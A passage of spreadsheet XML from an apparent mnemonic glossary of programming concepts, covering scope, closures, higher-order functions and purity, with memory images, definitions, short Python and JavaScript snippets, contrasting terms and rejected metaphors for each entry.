      <c r="H309" t="inlineStr">
        <is>
          <t>Boomerang (rejected: implies the input itself comes back, not a new value).</t>
        </is>
      </c>
      <c r="J309" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K309" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" t="n">
        <v>0</v>
      </c>
      <c r="B310" t="inlineStr">
        <is>
          <t>308</t>
        </is>
      </c>
      <c r="C310" t="inlineStr">
        <is>
          <t>Docstring</t>
        </is>
      </c>
      <c r="D310" t="inlineStr">
        <is>
          <t>A tiny instruction scroll rolled up just inside the machine's front panel — pop the panel (help()) and the scroll unrolls in your hands.</t>
        </is>
      </c>
      <c r="E310" t="inlineStr">
        <is>
          <t>A string literal placed first inside a function documenting purpose, parameters, and return; exposed at runtime via help() and __doc__.</t>
        </is>
      </c>
      <c r="F310" t="inlineStr">
        <is>
          <t>def norm(v): / '''Scale vector v to unit length.''' / ...</t>
        </is>
      </c>
      <c r="G310" t="inlineStr">
        <is>
          <t>Comment (#) — for maintainers reading source; docstrings are runtime-accessible API docs.</t>
        </is>
      </c>
      <c r="H310" t="inlineStr">
        <is>
          <t>Doctor's chart at the bedside (rejected: 'doc' pun but misses the placement rule).</t>
        </is>
      </c>
      <c r="J310" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K310" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" t="n">
        <v>0</v>
      </c>
      <c r="B311" t="inlineStr">
        <is>
          <t>309</t>
        </is>
      </c>
      <c r="C311" t="inlineStr">
        <is>
          <t>Do one thing</t>
        </is>
      </c>
      <c r="D311" t="inlineStr">
        <is>
          <t>A Swiss Army knife with every blade open at once slices your palm; the chef's single sharp knife makes one perfect cut.</t>
        </is>
      </c>
      <c r="E311" t="inlineStr">
        <is>
          <t>Keep each function small with a single responsibility at one level of abstraction; if the name needs 'and', split it.</t>
        </is>
      </c>
      <c r="F311" t="inlineStr">
        <is>
          <t>parse_and_save_and_email(f) # smell / recs = parse(f); save(recs); email(recs)</t>
        </is>
      </c>
      <c r="G311" t="inlineStr">
        <is>
          <t>DRY — about removing duplication; 'one thing' is about narrowing each unit's purpose.</t>
        </is>
      </c>
      <c r="H311" t="inlineStr">
        <is>
          <t>One-trick pony (rejected: pejorative tone undercuts the principle).</t>
        </is>
      </c>
      <c r="J311" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K311" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" t="n">
        <v>0</v>
      </c>
      <c r="B312" t="inlineStr">
        <is>
          <t>310</t>
        </is>
      </c>
      <c r="C312" t="inlineStr">
        <is>
          <t>Lexical scoping</t>
        </is>
      </c>
      <c r="D312" t="inlineStr">
        <is>
          <t>Words spoken in a house are heard only by rooms nested inside it, never by the house next door — the floor plan (source text), not the visitor, decides who hears.</t>
        </is>
      </c>
      <c r="E312" t="inlineStr">
        <is>
          <t>A name resolves to the binding visible where the code is written, not where it is called; scope follows the source text.</t>
        </is>
      </c>
      <c r="F312" t="inlineStr">
        <is>
          <t>x = 'outer' / def f(): print(x) # finds x by where f is WRITTEN / f()</t>
        </is>
      </c>
      <c r="G312" t="inlineStr">
        <is>
          <t>Dynamic scoping — resolves names by the runtime call stack instead of the source layout.</t>
        </is>
      </c>
      <c r="H312" t="inlineStr">
        <is>
          <t>Dictionary (lexicon) pages (rejected: encodes the word 'lexical' but not nesting).</t>
        </is>
      </c>
      <c r="J312" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K312" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" t="n">
        <v>0</v>
      </c>
      <c r="B313" t="inlineStr">
        <is>
          <t>311</t>
        </is>
      </c>
      <c r="C313" t="inlineStr">
        <is>
          <t>Scope chain (LEGB)</t>
        </is>
      </c>
      <c r="D313" t="inlineStr">
        <is>
          <t>You LEG it up a spiral staircase shouting a name: your room, the landing, the lobby, then the city registry (B) — the first voice that answers, you stop climbing.</t>
        </is>
      </c>
      <c r="E313" t="inlineStr">
        <is>
          <t>Name lookup walks outward through nested scopes — Local, Enclosing, Global, Builtins in Python — and stops at the first match.</t>
        </is>
      </c>
      <c r="F313" t="inlineStr">
        <is>
          <t>x = 'G' / def f(): / x = 'L'; print(x) # L wins; else E, then G, then B</t>
        </is>
      </c>
      <c r="G313" t="inlineStr">
        <is>
          <t>Shadowing — one visible effect of the chain: an inner binding hides an outer one of the same name.</t>
        </is>
      </c>
      <c r="H313" t="inlineStr">
        <is>
          <t>Russian nesting dolls (rejected: generic for anything nested).</t>
        </is>
      </c>
      <c r="J313" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K313" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" t="n">
        <v>0</v>
      </c>
      <c r="B314" t="inlineStr">
        <is>
          <t>312</t>
        </is>
      </c>
      <c r="C314" t="inlineStr">
        <is>
          <t>Closure</t>
        </is>
      </c>
      <c r="D314" t="inlineStr">
        <is>
          <t>A deep-sea diver strolls out of the ocean still wearing a bubble of seawater around his head — he carries his birth environment wherever he goes.</t>
        </is>
      </c>
      <c r="E314" t="inlineStr">
        <is>
          <t>A function bundled with the environment where it was defined, so it keeps using outer variables after that scope has returned.</t>
        </is>
      </c>
      <c r="F314" t="inlineStr">
        <is>
          <t>def make_adder(n): / return lambda x: x + n / add5 = make_adder(5); add5(2) # 7</t>
        </is>
      </c>
      <c r="G314" t="inlineStr">
        <is>
          <t>Lambda — a syntax for anonymous functions; a closure is any function that captures enclosing variables.</t>
        </is>
      </c>
      <c r="H314" t="inlineStr">
        <is>
          <t>Backpack of variables (rejected: tutorial cliche, weakly visual).</t>
        </is>
      </c>
      <c r="J314" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K314" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" t="n">
        <v>0</v>
      </c>
      <c r="B315" t="inlineStr">
        <is>
          <t>313</t>
        </is>
      </c>
      <c r="C315" t="inlineStr">
        <is>
          <t>Capture variables, not values</t>
        </is>
      </c>
      <c r="D315" t="inlineStr">
        <is>
          <t>You photograph a scoreboard but the print turns out to be a live video feed — glance at it later and the score has changed under your thumb.</t>
        </is>
      </c>
      <c r="E315" t="inlineStr">
        <is>
          <t>A closure holds a live reference to the outer variable itself, so later reassignment changes what the closure sees.</t>
        </is>
      </c>
      <c r="F315" t="inlineStr">
        <is>
          <t>n = 1 / f = lambda: n / n = 99; f() # 99, not 1</t>
        </is>
      </c>
      <c r="G315" t="inlineStr">
        <is>
          <t>Default-argument snapshot — lambda n=n: n copies the value at definition time, freezing it.</t>
        </is>
      </c>
      <c r="H315" t="inlineStr">
        <is>
          <t>Balloon tied to the variable by string (rejected: does not show late reads).</t>
        </is>
      </c>
      <c r="J315" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K315" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" t="n">
        <v>0</v>
      </c>
      <c r="B316" t="inlineStr">
        <is>
          <t>314</t>
        </is>
      </c>
      <c r="C316" t="inlineStr">
        <is>
          <t>Loop-variable capture bug</t>
        </is>
      </c>
      <c r="D316" t="inlineStr">
        <is>
          <t>Ten balloons all tied to one weather vane: when the wind dies, all ten point wherever the vane last settled — nobody kept their own direction.</t>
        </is>
      </c>
      <c r="E316" t="inlineStr">
        <is>
          <t>Closures created in a loop all share the single loop variable, so after the loop every one of them sees its final value.</t>
        </is>
      </c>
      <c r="F316" t="inlineStr">
        <is>
          <t>fs = [lambda: i for i in range(3)] / [f() for f in fs] # [2, 2, 2] / fs = [lambda i=i: i for i in range(3)] # fix</t>
        </is>
      </c>
      <c r="G316" t="inlineStr">
        <is>
          <t>JS var-in-loop — the same bug; let's per-iteration binding fixes it there, default args or factories in Python.</t>
        </is>
      </c>
      <c r="H316" t="inlineStr">
        <is>
          <t>Group photo of a marathon finish (rejected: a still image contradicts live capture).</t>
        </is>
      </c>
      <c r="J316" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K316" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" t="n">
        <v>0</v>
      </c>
      <c r="B317" t="inlineStr">
        <is>
          <t>315</t>
        </is>
      </c>
      <c r="C317" t="inlineStr">
        <is>
          <t>Private state via closure</t>
        </is>
      </c>
      <c r="D317" t="inlineStr">
        <is>
          <t>A piggy bank sealed inside a wall with two mail slots labeled DEPOSIT and BALANCE; only those slots reach the coins — there is no lid to pry.</t>
        </is>
      </c>
      <c r="E317" t="inlineStr">
        <is>
          <t>Returning inner functions that share an enclosing variable creates state only they can touch — encapsulation without classes.</t>
        </is>
      </c>
      <c r="F317" t="inlineStr">
        <is>
          <t>const counter = () =&gt; { let n = 0; return () =&gt; ++n; }; / const c = counter(); c(); c(); // 2</t>
        </is>
      </c>
      <c r="G317" t="inlineStr">
        <is>
          <t>Python 'private' attributes — an underscore convention, still reachable; closure state is truly inaccessible.</t>
        </is>
      </c>
      <c r="H317" t="inlineStr">
        <is>
          <t>Diary with a wristband key (rejected: a single accessor misses the shared-slot idea).</t>
        </is>
      </c>
      <c r="J317" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K317" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" t="n">
        <v>0</v>
      </c>
      <c r="B318" t="inlineStr">
        <is>
          <t>316</t>
        </is>
      </c>
      <c r="C318" t="inlineStr">
        <is>
          <t>Variable shadowing</t>
        </is>
      </c>
      <c r="D318" t="inlineStr">
        <is>
          <t>A tall stranger plants himself in front of grandpa's hallway portrait wearing the same nametag; everyone addresses the stranger while grandpa hangs hidden in shadow.</t>
        </is>
      </c>
      <c r="E318" t="inlineStr">
        <is>
          <t>An inner-scope binding reuses an outer name, hiding the outer variable for the rest of that scope and inviting confusion.</t>
        </is>
      </c>
      <c r="F318" t="inlineStr">
        <is>
          <t>total = 100 / def f(total): return total * 2 # outer total hidden / f(3) # 6</t>
        </is>
      </c>
      <c r="G318" t="inlineStr">
        <is>
          <t>Overriding — replaces an inherited method in a subclass; shadowing hides a name in a nested scope.</t>
        </is>
      </c>
      <c r="H318" t="inlineStr">
        <is>
          <t>Solar eclipse (rejected: overused for anything hidden).</t>
        </is>
      </c>
      <c r="J318" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K318" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" t="n">
        <v>0</v>
      </c>
      <c r="B319" t="inlineStr">
        <is>
          <t>317</t>
        </is>
      </c>
      <c r="C319" t="inlineStr">
        <is>
          <t>nonlocal and global</t>
        </is>
      </c>
      <c r="D319" t="inlineStr">
        <is>
          <t>Filling out a form in a booth you shout 'this goes on the BUILDING's ledger, not my notepad!' — the clerk stamps GLOBAL and carries it upstairs.</t>
        </is>
      </c>
      <c r="E319" t="inlineStr">
        <is>
          <t>Python declarations letting a function rebind an enclosing-scope name (nonlocal) or a module-level name (global) instead of creating a local.</t>
        </is>
      </c>
      <c r="F319" t="inlineStr">
        <is>
          <t>def outer(): / n = 0 / def bump(): nonlocal n; n += 1</t>
        </is>
      </c>
      <c r="G319" t="inlineStr">
        <is>
          <t>Reading outer names — needs no declaration; only assignment requires nonlocal or global.</t>
        </is>
      </c>
      <c r="H319" t="inlineStr">
        <is>
          <t>Megaphone to the world (rejected: global-only, misses nonlocal's middle floor).</t>
        </is>
      </c>
      <c r="J319" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K319" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" t="n">
        <v>0</v>
      </c>
      <c r="B320" t="inlineStr">
        <is>
          <t>318</t>
        </is>
      </c>
      <c r="C320" t="inlineStr">
        <is>
          <t>Hoisting</t>
        </is>
      </c>
      <c r="D320" t="inlineStr">
        <is>
          <t>A crane hoists every crate's empty shell to the warehouse ceiling before dawn; grab one too early and it is there — but hollow (undefined).</t>
        </is>
      </c>
      <c r="E320" t="inlineStr">
        <is>
          <t>JavaScript lifts var and function declarations to the top of their scope, so vars read as undefined before their assignment line runs.</t>
        </is>
      </c>
      <c r="F320" t="inlineStr">
        <is>
          <t>console.log(x); // undefined, not an error / var x = 5; // declaration hoisted, value not</t>
        </is>
      </c>
      <c r="G320" t="inlineStr">
        <is>
          <t>let/const TDZ — also hoisted but locked in a temporal dead zone; early access throws instead of undefined.</t>
        </is>
      </c>
      <c r="H320" t="inlineStr">
        <is>
          <t>Elevator jumping the queue (rejected: misses the empty-value half).</t>
        </is>
      </c>
      <c r="J320" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K320" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" t="n">
        <v>0</v>
      </c>
      <c r="B321" t="inlineStr">
        <is>
          <t>319</t>
        </is>
      </c>
      <c r="C321" t="inlineStr">
        <is>
          <t>Block vs function scope</t>
        </is>
      </c>
      <c r="D321" t="inlineStr">
        <is>
          <t>Two hotels: in Hotel Var your keycard opens every room on the floor; in Hotel Let it opens only the one room where it was cut.</t>
        </is>
      </c>
      <c r="E321" t="inlineStr">
        <is>
          <t>var and Python locals live for the whole function; let/const and most modern languages confine variables to the enclosing block.</t>
        </is>
      </c>
      <c r="F321" t="inlineStr">
        <is>
          <t>if (true) { var a = 1; let b = 2; } / a; // 1 escapes the block / b; // ReferenceError</t>
        </is>
      </c>
      <c r="G321" t="inlineStr">
        <is>
          <t>Lexical vs dynamic scope — how names resolve; block vs function is how far a binding extends.</t>
        </is>
      </c>
      <c r="H321" t="inlineStr">
        <is>
          <t>Fenced garden vs open field (rejected: too pastoral to recall mechanics).</t>
        </is>
      </c>
      <c r="J321" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K321" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" t="n">
        <v>0</v>
      </c>
      <c r="B322" t="inlineStr">
        <is>
          <t>320</t>
        </is>
      </c>
      <c r="C322" t="inlineStr">
        <is>
          <t>First-class functions</t>
        </is>
      </c>
      <c r="D322" t="inlineStr">
        <is>
          <t>At the airport a function rides in seat 1A with its own boarding pass and luggage tag, like any passenger — first class, not crew locked in the cockpit.</t>
        </is>
      </c>
      <c r="E322" t="inlineStr">
        <is>
          <t>Functions are ordinary values: assignable to variables, passed as arguments, returned from calls, and stored in data structures.</t>
        </is>
      </c>
      <c r="F322" t="inlineStr">
        <is>
          <t>ops = {'+': add, '*': mul} / apply = ops['*'] / apply(3, 4) # 12</t>
        </is>
      </c>
      <c r="G322" t="inlineStr">
        <is>
          <t>Higher-order function — a consumer/producer of functions; first-class is the language property enabling it.</t>
        </is>
      </c>
      <c r="H322" t="inlineStr">
        <is>
          <t>VIP backstage pass (rejected: implies privilege, not ordinariness).</t>
        </is>
      </c>
      <c r="J322" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K322" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" t="n">
        <v>0</v>
      </c>
      <c r="B323" t="inlineStr">
        <is>
          <t>321</t>
        </is>
      </c>
      <c r="C323" t="inlineStr">
        <is>
          <t>Higher-order function</t>
        </is>
      </c>
      <c r="D323" t="inlineStr">
        <is>
          <t>A crane lifting other cranes onto a rooftop: machinery whose cargo is machinery.</t>
        </is>
      </c>
      <c r="E323" t="inlineStr">
        <is>
          <t>A function that takes one or more functions as arguments or returns a function as its result.</t>
        </is>
      </c>
      <c r="F323" t="inlineStr">
        <is>
          <t>def twice(f, x): return f(f(x)) / twice(lambda n: n + 3, 10) # 16</t>
        </is>
      </c>
      <c r="G323" t="inlineStr">
        <is>
          <t>First-class functions — the language feature; higher-order describes a particular function's signature.</t>
        </is>
      </c>
      <c r="H323" t="inlineStr">
        <is>
          <t>Russian doll of functions (rejected: nesting is not the point, parameterization is).</t>
        </is>
      </c>
      <c r="J323" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K323" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" t="n">
        <v>0</v>
      </c>
      <c r="B324" t="inlineStr">
        <is>
          <t>322</t>
        </is>
      </c>
      <c r="C324" t="inlineStr">
        <is>
          <t>Lambda (anonymous function)</t>
        </is>
      </c>
      <c r="D324" t="inlineStr">
        <is>
          <t>A masked street performer does exactly one trick and vanishes — no name on any poster, hired on the spot. The mask is shaped like a Greek lambda.</t>
        </is>
      </c>
      <c r="E324" t="inlineStr">
        <is>
          <t>A small nameless function written inline as a single expression, used where naming a one-off function would be noise.</t>
        </is>
      </c>
      <c r="F324" t="inlineStr">
        <is>
          <t>sorted(words, key=lambda w: len(w)) / (lambda x, y: x * y)(3, 4) # 12</t>
        </is>
      </c>
      <c r="G324" t="inlineStr">
        <is>
          <t>def — a named statement allowing full bodies and docstrings; lambda is one nameless expression.</t>
        </is>
      </c>
      <c r="H324" t="inlineStr">
        <is>
          <t>A lamb doing tricks (rejected: sound-alike encodes nothing about anonymity).</t>
        </is>
      </c>
      <c r="J324" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K324" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" t="n">
        <v>0</v>
      </c>
      <c r="B325" t="inlineStr">
        <is>
          <t>323</t>
        </is>
      </c>
      <c r="C325" t="inlineStr">
        <is>
          <t>map</t>
        </is>
      </c>
      <c r="D325" t="inlineStr">
        <is>
          <t>A car-wash conveyor: every dirty car enters, the identical scrub hits each one, and the same count of clean cars rolls out in order.</t>
        </is>
      </c>
      <c r="E325" t="inlineStr">
        <is>
          <t>Applies a function to every element of a sequence, producing a new sequence of results with the same length and order.</t>
        </is>
      </c>
      <c r="F325" t="inlineStr">
        <is>
          <t>list(map(str.upper, ['a', 'b'])) # ['A', 'B'] / [x*x for x in nums] # Pythonic map</t>
        </is>
      </c>
      <c r="G325" t="inlineStr">
        <is>
          <t>filter — drops elements by a test; map transforms every element and never changes the count.</t>
        </is>
      </c>
      <c r="H325" t="inlineStr">
        <is>
          <t>Cartographer's map (rejected: name pun without transformation).</t>
        </is>
      </c>
      <c r="J325" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K325" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" t="n">
        <v>0</v>
      </c>
      <c r="B326" t="inlineStr">
        <is>
          <t>324</t>
        </is>
      </c>
      <c r="C326" t="inlineStr">
        <is>
          <t>filter</t>
        </is>
      </c>
      <c r="D326" t="inlineStr">
        <is>
          <t>A coffee filter: grounds stay trapped in the paper while only liquid that passes the mesh test drips into the pot below.</t>
        </is>
      </c>
      <c r="E326" t="inlineStr">
        <is>
          <t>Keeps only the elements of a sequence for which a predicate function returns true, preserving their original order.</t>
        </is>
      </c>
      <c r="F326" t="inlineStr">
        <is>
          <t>list(filter(lambda n: n % 2 == 0, nums)) / [n for n in nums if n % 2 == 0]</t>
        </is>
      </c>
      <c r="G326" t="inlineStr">
        <is>
          <t>map — transforms each element; filter never alters elements, only rejects some.</t>
        </is>
      </c>
      <c r="H326" t="inlineStr">
        <is>
          <t>Bouncer with a clipboard (rejected: overused for any validation).</t>
        </is>
      </c>
      <c r="J326" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K326" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" t="n">
        <v>0</v>
      </c>
      <c r="B327" t="inlineStr">
        <is>
          <t>325</t>
        </is>
      </c>
      <c r="C327" t="inlineStr">
        <is>
          <t>reduce (fold)</t>
        </is>
      </c>
      <c r="D327" t="inlineStr">
        <is>
          <t>A snowball rolling downhill swallows flake after flake — each pass folds one more snowflake into the growing ball, and a single boulder arrives at the bottom.</t>
        </is>
      </c>
      <c r="E327" t="inlineStr">
        <is>
          <t>Collapses a sequence to a single value by repeatedly combining an accumulator with each element using a binary function.</t>
        </is>
      </c>
      <c r="F327" t="inlineStr">
        <is>
          <t>from functools import reduce / reduce(lambda acc, x: acc + x, [1, 2, 3, 4], 0) # 10</t>
        </is>
      </c>
      <c r="G327" t="inlineStr">
        <is>
          <t>sum/max/join — special-case reductions; reduce is the general fold behind them all.</t>
        </is>
      </c>
      <c r="H327" t="inlineStr">
        <is>
          <t>Trash compactor (rejected: destroys structure without a combining rule).</t>
        </is>
      </c>
      <c r="J327" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K327" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" t="n">
        <v>0</v>
      </c>
      <c r="B328" t="inlineStr">
        <is>
          <t>326</t>
        </is>
      </c>
      <c r="C328" t="inlineStr">
        <is>
          <t>Callback</t>
        </is>
      </c>
      <c r="D328" t="inlineStr">
        <is>
          <t>You leave your phone number at the bakery: 'call me back when the bread is out.' You walk away; THEY dial the number, not you.</t>
        </is>
      </c>
      <c r="E328" t="inlineStr">
        <is>
          <t>A function you hand to other code to be invoked later, when an event fires or a task finishes.</t>
        </is>
      </c>
      <c r="F328" t="inlineStr">
        <is>
          <t>button.on_click(save_draft) / fetch(url, on_done=parse)</t>
        </is>
      </c>
      <c r="G328" t="inlineStr">
        <is>
          <t>Promise/Future — a value you await; a callback is code the framework calls into.</t>
        </is>
      </c>
      <c r="H328" t="inlineStr">
        <is>
          <t>Boomerang note (rejected: return imagery already taken by 307).</t>
        </is>
      </c>
      <c r="J328" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K328" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" t="n">
        <v>0</v>
      </c>
      <c r="B329" t="inlineStr">
        <is>
          <t>327</t>
        </is>
      </c>
      <c r="C329" t="inlineStr">
        <is>
          <t>Function factory</t>
        </is>
      </c>
      <c r="D329" t="inlineStr">
        <is>
          <t>A cookie-cutter press: feed in a shape parameter and the machine stamps out a new CUTTER you keep — this factory sells tools, not cookies.</t>
        </is>
      </c>
      <c r="E329" t="inlineStr">
        <is>
          <t>A function that builds and returns new customized functions, baking configuration into each product via closure.</t>
        </is>
      </c>
      <c r="F329" t="inlineStr">
        <is>
          <t>def pow_of(n): return lambda x: x ** n / square = pow_of(2); cube = pow_of(3)</t>
        </is>
      </c>
      <c r="G329" t="inlineStr">
        <is>
          <t>Factory pattern (OOP) — returns objects; a function factory returns callables closed over config.</t>
        </is>
      </c>
      <c r="H329" t="inlineStr">
        <is>
          <t>3D printer printing 3D printers (rejected: recursion vibe misleads).</t>
        </is>
      </c>
      <c r="J329" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K329" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" t="n">
        <v>0</v>
      </c>
      <c r="B330" t="inlineStr">
        <is>
          <t>328</t>
        </is>
      </c>
      <c r="C330" t="inlineStr">
        <is>
          <t>Decorator</t>
        </is>
      </c>
      <c r="D330" t="inlineStr">
        <is>
          <t>A gift wrapper at a mall kiosk: your gift goes in unchanged and comes out in ribboned paper that greets (logs) whoever opens it. The @ sign is the bow.</t>
        </is>
      </c>
      <c r="E330" t="inlineStr">
        <is>
          <t>A higher-order function that wraps another to add behavior — logging, caching, auth — without editing its body; @name applies it.</t>
        </is>
      </c>
      <c r="F330" t="inlineStr">
        <is>
          <t>@lru_cache / def fib(n): return n if n &lt; 2 else fib(n-1) + fib(n-2)</t>
        </is>
      </c>
      <c r="G330" t="inlineStr">
        <is>
          <t>Decorator pattern (OOP) — same idea with wrapper objects; Python decorators wrap once, at definition time.</t>
        </is>
      </c>
      <c r="H330" t="inlineStr">
        <is>
          <t>Interior decorator repainting rooms (rejected: mutation image contradicts wrapping).</t>
        </is>
      </c>
      <c r="J330" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K330" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" t="n">
        <v>0</v>
      </c>
      <c r="B331" t="inlineStr">
        <is>
          <t>329</t>
        </is>
      </c>
      <c r="C331" t="inlineStr">
        <is>
          <t>Key function</t>
        </is>
      </c>
      <c r="D331" t="inlineStr">
        <is>
          <t>A librarian sorts crates of books by scanning only the spine sticker her key function extracts — she never opens a single book.</t>
        </is>
      </c>
      <c r="E331" t="inlineStr">
        <is>
          <t>A one-argument function given to sort/min/max that extracts each element's comparison value, separating ordering logic from data.</t>
        </is>
      </c>
      <c r="F331" t="inlineStr">
        <is>
          <t>sorted(people, key=lambda p: p.age) / max(words, key=len)</t>
        </is>
      </c>
      <c r="G331" t="inlineStr">
        <is>
          <t>Comparator (cmp) — takes two items and returns -1/0/1; a key maps each single item to a sortable proxy.</t>
        </is>
      </c>
      <c r="H331" t="inlineStr">
        <is>
          <t>Piano keys (rejected: sound-alike with zero sorting content).</t>
        </is>
      </c>
      <c r="J331" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K331" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" t="n">
        <v>0</v>
      </c>
      <c r="B332" t="inlineStr">
        <is>
          <t>330</t>
        </is>
      </c>
      <c r="C332" t="inlineStr">
        <is>
          <t>Pure function</t>
        </is>
      </c>
      <c r="D332" t="inlineStr">
        <is>
          <t>A glass calculator sealed in a vacuum jar: press 2+2 and 4 lights up — no smoke escapes, no bell rings, nothing inside is different afterward.</t>
        </is>
      </c>
      <c r="E332" t="inlineStr">
        <is>
          <t>A function whose output depends only on its arguments and which causes no observable side effects — same input, same output, always.</t>
        </is>
      </c>
      <c r="F332" t="inlineStr">
        <is>
          <t>def area(r): return 3.14159 * r * r # pure / def loud(r): print(r); return r * r # impure: I/O</t>
        </is>
      </c>
      <c r="G332" t="inlineStr">
        <is>
          <t>Deterministic function — same output for same input, but may still write files; purity also bans effects.</t>
        </is>
      </c>
      <c r="H332" t="inlineStr">
        <is>
          <t>Monk in a sealed cell (rejected: 'pure' pun, weak mechanism).</t>
        </is>
      </c>
      <c r="J332" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K332" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" t="n">
        <v>0</v>
      </c>
      <c r="B333" t="inlineStr">
        <is>
          <t>331</t>
        </is>
      </c>
      <c r="C333" t="inlineStr">
        <is>
          <t>Side effect</t>
        </is>
      </c>
      <c r="D333" t="inlineStr">
        <is>
          <t>A waiter takes your order and on the way to the kitchen quietly rearranges every table in the restaurant — your receipt looks normal, the room does not.</t>
        </is>
      </c>
      <c r="E333" t="inlineStr">
        <is>
          <t>Any observable change a function makes beyond returning a value: mutating state, doing I/O, altering globals or its arguments.</t>
        </is>
      </c>
      <c r="F333" t="inlineStr">
        <is>
          <t>def add_user(u): USERS.append(u) # mutates global / def save(x): db.write(x) # I/O</t>
        </is>
      </c>
      <c r="G333" t="inlineStr">
        <is>
          <t>Return value — the declared, visible output; side effects are the undeclared extra changes.</t>
        </is>
      </c>
      <c r="H333" t="inlineStr">
        <is>
          <t>Medication side effects (rejected: accurate but a non-visual cliche).</t>
        </is>
      </c>
      <c r="J333" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K333" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" t="n">
        <v>0</v>
      </c>
      <c r="B334" t="inlineStr">
        <is>
          <t>332</t>
        </is>
      </c>
      <c r="C334" t="inlineStr">
        <is>
          <t>Referential transparency</t>
        </is>
      </c>
      <c r="D334" t="inlineStr">
        <is>
          <t>A perfectly transparent sticker printed '42' laid over the expression on the page: read through it or read the label, the program means the same.</t>
        </is>
      </c>
      <c r="E334" t="inlineStr">
        <is>
          <t>An expression can be replaced by its value anywhere without changing program behavior — the hallmark of purity.</t>
        </is>
      </c>
      <c r="F334" t="inlineStr">
        <is>
          <t>y = f(2) + f(2) / y = 2 * f(2) # legal rewrite iff f is pure</t>
        </is>
      </c>
      <c r="G334" t="inlineStr">
        <is>
